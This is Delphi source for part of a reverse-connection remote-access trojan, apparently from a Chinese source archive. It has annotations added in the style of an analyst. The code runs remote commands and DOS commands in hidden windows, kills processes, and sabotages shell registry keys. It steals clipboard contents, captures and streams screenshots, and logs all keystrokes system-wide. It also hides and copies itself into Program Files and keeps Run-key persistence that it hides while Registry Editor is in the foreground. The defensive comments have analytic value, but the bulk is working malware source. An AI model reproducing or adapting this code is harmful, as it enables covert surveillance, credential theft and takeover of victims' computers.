
📄 unit1.pas

📁 反弹木马设计全部源码Delphi源码
374:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32',true) then
      reg.WriteString ('','%SystemRoot%\system32\SHELL32.dll-');
    end;
375:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\InProcServer32',true) then
      reg.WriteString ('','%SystemRoot%\system32\SHELL32.dll-');      
    end;
376:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32',true) then
      reg.WriteString ('','shell32.dll-');      
    end;
377:begin
     reg.RootKey := HKEY_CLASSES_ROOT;
     if reg.OpenKey('CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InProcServer32',true) then
      reg.WriteString ('','shell32.dll-');      
    end;

379:begin
     reg.RootKey := HKEY_CURRENT_USER;
     if reg.OpenKey('Control Panel\Mouse',true) then
      reg.WriteString('SwapMouseButtons','1');
    end;
380:begin
     reg.RootKey := HKEY_LOCAL_MACHINE;
     if reg.OpenKey('SOFTWARE\Classes\.inf',true) then
      reg.WriteString('','txtfile');
    end;
381:begin
     reg.RootKey := HKEY_LOCAL_MACHINE;
     if reg.OpenKey('SOFTWARE\Classes\.reg',true) then
      reg.WriteString('','txtfile');
    end;

401:begin//查看进程
     sx();
     Socket.SendText('401'+lb1.Items.Text);
    end;
402:begin//终止进程
     HSnapshot:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
     Lppe.dwSize:=Sizeof(Lppe);
     Found:=Process32First(HSnapshot,Lppe);
     while Found do
     begin
       try
        if Lppe.szExeFile=copy(strr,4,length(strr)-3) then
         begin
          HProcess:=OpenProcess(PROCESS_ALL_ACCESS, FALSE, Lppe.th32ProcessID);
          TerminateProcess(HProcess,0);
          sx();
          Socket.SendText('401'+lb1.Items.Text);
          exit;
         end;
       except
       end;
       Found:=Process32Next(HSnapshot,Lppe);
     end;
    end;
403:begin//显示对话框
        ST1:= copy(strr,4,1);
        tit:= pchar(copy(strr,5,12));
        speak:=pchar(copy(strr,17,length(strr)-16));
        IF ST1='1' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONHAND)
        ELSE IF ST1='2' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONASTERISK)
        ELSE IF ST1='3' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONWARNING)
        ELSE IF ST1='4' THEN
         APPLICATION.MessageBox(speak,tit,MB_ICONQUESTION);
    end;

501:begin//得到当前活动窗体名
     st:= GetForegroundWindow;
     L:=GetWindowTextLength(st)+1;
     GetMem(Name,L);
     GetWindowText(st,Name,L);
     Socket.SendText('501'+string(name));
    end;
502:begin//更改当前活动窗体名
     st:= GetForegroundWindow;
     tem:=copy(strr,4,length(strr)-3);
     SetWindowText(st,pchar(tem));
     retu();
    end;
503:begin//杀IE窗口
     IEwin := FindWindow('IEFrame',nil);
     If IEwin <> 0 Then
      SendMessage(IEwin,WM_SYSCOMMAND,SC_CLOSE,0);
     retu();
    end;
504:begin//隐藏状态栏
     hideTaskbar;
     retu();
    end;
505:begin//显示状态栏
     showTaskbar;
     retu();
    end; 
506:socket.SendText('506'+Clipboard.asText);//查看剪贴板内容
507:Clipboard.Clear;//清空剪贴板内容
508:begin//隐藏桌面
     hDesktop := FindWindow('Progman', nil);
     ShowWindow(hDesktop, SW_HIDE);
     retu();
    end;
509:begin//显示桌面
     hDesktop := FindWindow('Progman', nil);
     ShowWindow(hDesktop, SW_SHOW);
     retu();
    end;
510:begin//隐藏开始按钮
     hwnd1:=findwindow('shell_traywnd',nil);
     hwnd2:=getwindow(hwnd1,gw_child);
     getclassname(hwnd2,pchar(bgba),255);
     showwindow(hwnd2,sw_hide);
     retu();
    end;
511:begin//显示开始按钮
     hwnd1:=findwindow('shell_traywnd',nil);
     hwnd2:=getwindow(hwnd1,gw_child);
     getclassname(hwnd2,pchar(bgba),255);
     showwindow(hwnd2,sw_show);
     retu();
    end;
520:TurnScreenSaverOn;//屏保

601:begin//执行命令
      i:=pos('{',strr);
      DOSN:=COPY(strr,5,i-5);//得到命令
      DOSC:=COPY(strr,i+1,length(strr));//得到参数
      i:=strtoint(copy(strr,4,1));//得到方式
     case i of//运行命令
      1:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_SHOWNORMAL);
      2:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_MAXIMIZE);
      3:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_MINIMIZE);
      4:shellexecute(handle,'open',pchar(DOSN),pchar(DOSC),nil,SW_HIDE);
     end;
     retu();
    end;
602:begin//执行dos命令
     i:=strtoint(copy(strr,4,1));//得到方式
     DOSC:=COPY(STRR,5,LENGTH(STRR)-4);
     case i of//运行命令
      1:WinExec(pchar('COMMAND.COM /C '+dosc),SW_SHOWNORMAL);
      2:WinExec(pchar('COMMAND.COM /C '+dosc),SW_MAXIMIZE);
      3:WinExec(pchar('COMMAND.COM /C '+dosc),SW_MINIMIZE);
      4:WinExec(pchar('COMMAND.COM /C '+dosc),SW_HIDE);
     end;
     retu();
    end;

701:begin
      try
        MYst := TMemorystream.Create;{建立内存流}
        MyBmp := TBitmap.Create;
        Myjpg := TJpegimage.Create;
        Cjt_GetScreen(MyBmp, True); {True表示抓鼠标图像}
        Myjpg.Assign(MyBmp); {将BMP图象转成JPG格式,便于在互联网上传输}
        Myjpg.CompressionQuality := strtoint(copy(strr,4,length(strr)-3)); {JPG文件压缩百分比设置,数字越大图像越清晰,但数据也越大}
        Myjpg.SaveToStream(MYst); {将JPG图象写入流中}
        Myjpg.free;
        MYst.Position := 0;
        s1 := inttostr(MYst.size);{流的大小}
        cs.Socket.sendtext('701'+s1); {发送流大小}
      finally
        MyBmp.free;
      end;
    end;
702:begin {客户端已准备好接收图象}
      MYst.Position := 0;
      cs.Socket.SendStream(MYst); {将流发送出去}
    end;

  end;
end;

// Disconnect handler for the cs client socket.
// Sets the form caption to the literal below, enables timer1, disables the
// keyti timer, and calls fdir on the root of the drive selected in DCB.
// NOTE(review): the timer1 handler and fdir are not visible in this part of
// the unit. timer1 presumably drives the reconnect attempt and keyti is
// presumably the timer behind keytiTimer (keystroke capture) -- confirm both.
// For an analyst: after a dropped connection the process stays resident with
// a timer armed rather than exiting.
procedure TForm1.csDisconnect(Sender: TObject; Socket: TCustomWinSocket);
begin
 form1.Caption :='断开';
 timer1.Enabled :=true;
 keyti.Enabled :=false;
 LPH:= DCB.Drive+':\';
 fdir(LPH);
end;

// Close-query handler: before the form closes, sends one message made of the
// code '999' followed by the result of ipdd() over the CS socket, then closes
// the socket. CanClose is not modified here.
// NOTE(review): ipdd is defined outside this part of the unit; from its name
// it presumably returns the local IP address -- confirm.
// For an analyst: '999' + <ipdd result> is the sign-off message this sample
// emits on a clean exit, useful when matching captured traffic to the sample.
procedure TForm1.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
begin//on exit
  CS.Socket.SendText('999'+ ipdd());
  cs.Close;
end;

// Timer handler that records keystrokes into the M1 memo control.
// On every tick it walks virtual-key codes 8..222 and, for each code whose
// GetAsyncKeyState result equals -32767, appends a printable character or a
// bracketed key name to M1 (Backspace instead removes the last character of
// the last line). Shift and Caps Lock state are read with GetKeyState to pick
// the upper/lower or shifted symbol. Codes with no case label are ignored.
//
// Defensive notes:
// - No keyboard hook is installed; capture is by polling GetAsyncKeyState
//   across the whole key range from a timer. That API reports key state
//   system-wide, so input typed into other applications is recorded too.
// - -32767 is $8001 as a 16-bit signed value: the "currently down" bit plus
//   the "pressed since the previous call" bit, which is how each key press is
//   counted once.
// - The timer interval and where M1's contents are sent are not visible in
//   this procedure.
procedure TForm1.keytiTimer(Sender: TObject);
var//keystroke logging
  i : byte;
begin
  for i:=8 To 222 do
  begin
     if GetAsyncKeyState(i)=-32767 then
      begin
      case i of
      8  : M1.Lines[M1.Lines.count-1] := copy(M1.Lines[M1.Lines.count-1],1,length(M1.Lines[M1.Lines.count-1])-1); //Backspace
      9  : M1.text:=M1.text+'[Tab]';
      13 : M1.text:=M1.text+#13#10; //Enter
      17 : M1.text:=M1.text+'[Ctrl]';
      27 : M1.text:=M1.text+'[Esc]';
      32 :M1.text:=M1.text+' '; //Space
      // Del,Ins,Home,PageUp,PageDown,End
      33 : M1.text := M1.text + '[Page Up]';
      34 : M1.text := M1.text + '[Page Down]';
      35 : M1.text := M1.text + '[End]';
      36 : M1.text := M1.text + '[Home]';
      37 : M1.text := M1.text + '[Left]';
      38 : M1.text := M1.text + '[Up]';
      39 : M1.text := M1.text + '[Right]';
      40 : M1.text := M1.text + '[Down]';

      44 : M1.text := M1.text + '[Print Screen]';
      45 : M1.text := M1.text + '[Insert]';
      46 : M1.text := M1.text + '[Del]';
      145 : M1.text := M1.text + '[Scroll Lock]';
      // Top-row digits: the shifted symbol is chosen from the live Shift state.
      48 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+')'
           else M1.text:=M1.text+'0';
      49 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'!'
           else M1.text:=M1.text+'1';
      50 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'@'
           else M1.text:=M1.text+'2';
      51 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'#'
           else M1.text:=M1.text+'3';
      52 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'$'
           else M1.text:=M1.text+'4';
      53 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'%'
           else M1.text:=M1.text+'5';
      54 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'^'
           else M1.text:=M1.text+'6';
      55 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'&'
           else M1.text:=M1.text+'7';
      56 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'*'
           else M1.text:=M1.text+'8';
      57 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'('
           else M1.text:=M1.text+'9';
      65..90 : // a..z , A..Z
          begin
          // Caps Lock toggled on inverts the effect of Shift on letter case.
          if ((GetKeyState(VK_CAPITAL))=1) then
              if GetKeyState(VK_SHIFT)<0 then
                 M1.text:=M1.text+LowerCase(Chr(i)) //a..z
              else
                 M1.text:=M1.text+UpperCase(Chr(i)) //A..Z
          else
              if GetKeyState(VK_SHIFT)<0 then
                  M1.text:=M1.text+UpperCase(Chr(i)) //A..Z
              else
                  M1.text:=M1.text+LowerCase(Chr(i)); //a..z
          end;
      96..105 : M1.text:=M1.text + inttostr(i-96); //Numpad  0..9
      106:M1.text:=M1.text+'*';
      107:M1.text:=M1.text+'&';
      109:M1.text:=M1.text+'-';
      110:M1.text:=M1.text+'.';
      111:M1.text:=M1.text+'/';
      144 : M1.text:=M1.text+'[Num Lock]';

      112..123: //F1-F12
          M1.text:=M1.text+'[F'+IntToStr(i - 111)+']';

      // Punctuation keys, again resolved against the live Shift state.
      186 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+':'
            else M1.text:=M1.text+';';
      187 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'+'
            else M1.text:=M1.text+'=';
      188 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'<'
            else M1.text:=M1.text+',';
      189 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'_'
            else M1.text:=M1.text+'-';
      190 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'>'
            else M1.text:=M1.text+'.';
      191 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'?'
            else M1.text:=M1.text+'/';
      192 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'~'
            else M1.text:=M1.text+'`';
      219 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'{'
            else M1.text:=M1.text+'[';
      220 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'|'
            else M1.text:=M1.text+'\';
      221 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'}'
            else M1.text:=M1.text+']';
      222 : if GetKeyState(VK_SHIFT)<0 then M1.text:=M1.text+'"'
            else M1.text:=M1.text+'''';
      end;
      end;
  end;
end;

// Change handler for the DCB drive selector: stores the selected drive's root
// path ('<drive>:\') in LPH and calls fdir on it.
// NOTE(review): LPH and fdir are declared outside this part of the unit; fdir
// presumably enumerates the directory -- confirm.
procedure TForm1.DCBChange(Sender: TObject);
begin
  LPH:= DCB.Drive+':\';
  fdir(LPH);
end;

// Form start-up routine. It does three things in order:
//  1. Reads a settings record appended to the end of its own executable,
//     writes it to a temporary 'st.txt' next to the executable, parses the
//     first line into seta/setb/setc (fields separated by '>>>'), and deletes
//     the temporary file.
//  2. Sets the hidden attribute on its own executable.
//  3. If it is not already running from '<windir drive>\Program Files\<name>',
//     copies itself there, hides the copy, launches it with a hidden window,
//     and terminates the current instance.
// Finally it enables Timer1.
// lik, i, seta, setb and setc are not declared in this procedure; they come
// from elsewhere in the unit and their meaning is not visible here.
//
// Defensive notes (artifacts visible from this code):
// - a short-lived 'st.txt' created and deleted beside the executable;
// - an executable with the hidden attribute placed directly in the root of
//   '\Program Files\', not inside a vendor subfolder;
// - a process that copies its own image, starts the copy with SW_HIDE and
//   exits, which shows up as a self-copy followed by a parent/child pair with
//   the same file name in process-creation logs;
// - settings carried as an overlay at the end of the PE file, so the last
//   bytes of a sample are where an analyst would look for seta/setb/setc.
procedure TForm1.FormCreate(Sender: TObject);
var myn,myn2: string;
    fme:TMemoryStream;
    clf:TfileStream;
    size:integer;
    ss,stf:string;
    f:textfile;
begin
    lik:=0;
    DCB.Text :='C:';
    stf:=ExtractFilePath(application.ExeName)+'\st.txt';
    fme:=TMemoryStream.Create;
    clf:=Tfilestream.Create(application.ExeName,fmShareDenyNone);

    try
        // The last sizeof(size) bytes of the executable hold the length of the
        // appended record; the record itself sits immediately before them.
        clf.Seek(-sizeof(size),soFromEnd);
        clf.ReadBuffer(size,sizeof(size));
        clf.Seek(-size,soFromEnd);
        fme.CopyFrom(clf,size-sizeof(size));
        fme.SaveToFile(stf);
    finally
        fme.Free;
        clf.Free;

        // This parsing is inside the finally section, so it runs whether or
        // not the extraction above raised an exception.
        assignfile(f,stf);
        reset(f);
        readln(f,ss);
        // Split the first line on '>>>' into three fields.
        i:=pos('>>>',ss);
        seta:=copy(ss,1,i-1);
        ss:=copy(ss,i+3,length(ss));
        i:=pos('>>>',ss);
        setb:=copy(ss,1,i-1);
        ss:=copy(ss,i+3,length(ss));
        i:=pos('>>>',ss);
        setc:=copy(ss,1,i-1);
        closefile(f);
        deletefile(stf);
    end;

  myn := ExtractFilename(Application.Exename);
  // Mark the running executable as hidden; the caption is blanked on success.
  IF FILESETATTR(Application.Exename,0+FAHIDDEN)=0 THEN FORM1.Caption :='';
  // Target path: first two characters of the Windows directory (the drive)
  // plus '\Program Files\' plus this executable's file name.
  myn2:=COPY(trim(GetWindir),1,2)+'\Program Files\'+myn;
  if application.Exename <> myn2 then
   begin
    // Not running from the target path: copy, hide the copy, start it with a
    // hidden window, and end this instance.
    copyfile(pchar(application.Exename), pchar(myn2), False);
    IF FILESETATTR(myn2,0+FAHIDDEN)=0 THEN FORM1.Caption :='';
    Winexec(pchar(myn2), sw_hide);
    application.Terminate;
   end;
  Timer1.Enabled :=true; 
end;

// Timer handler that maintains the autostart registry entry.
// On each tick it opens HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
// CurrentVersion\Run and writes the value 'PHIME2OO2ASyst' pointing at this
// executable. It also reads the title of the foreground window; when that
// title equals the string literal compared below (the Chinese-language title
// of Registry Editor), it deletes the value again in the same tick.
// The buffer obtained with GetMem is not released in this procedure.
// The timer interval is set outside this procedure.
//
// Defensive notes:
// - The Run value name 'PHIME2OO2ASyst' is a stable indicator for this sample.
// - The entry is removed only while a window with that exact title is in the
//   foreground, so looking in the interactive Registry Editor on a matching
//   locale will not show it. Command-line queries, autostart-enumeration
//   tools, or offline hive analysis are not affected by this check.
// - The value is rewritten on every tick, and deleted and rewritten around
//   Registry Editor use; registry auditing that records value-set and
//   value-delete events on the Run key will show this repeated pattern.
procedure TForm1.RECLTimer(Sender: TObject);
VAR reg:Tregistry;
    st:hwnd;
    L:integer;
    Name:PChar;
begin//run at startup (persistence)
    reg:=tregistry.Create ;
    reg.RootKey :=HKEY_LOCAL_MACHINE;

    // Fetch the caption of whichever window currently has the foreground.
    st:= GetForegroundWindow;
    L:=GetWindowTextLength(st)+1;
    GetMem(Name,L);
    GetWindowText(st,Name,L);

    // (Re)write the autostart value; OpenKey's True argument creates the key
    // if it does not exist.
    IF reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True) then
       reg.WriteString('PHIME2OO2ASyst',Application.ExeName);

    // Remove the value while Registry Editor is the foreground window.
    if String(name)='注册表编辑器' then
       reg.DeleteValue ('PHIME2OO2ASyst');


  reg.CloseKey ;
  reg.Free ;
end;


end.
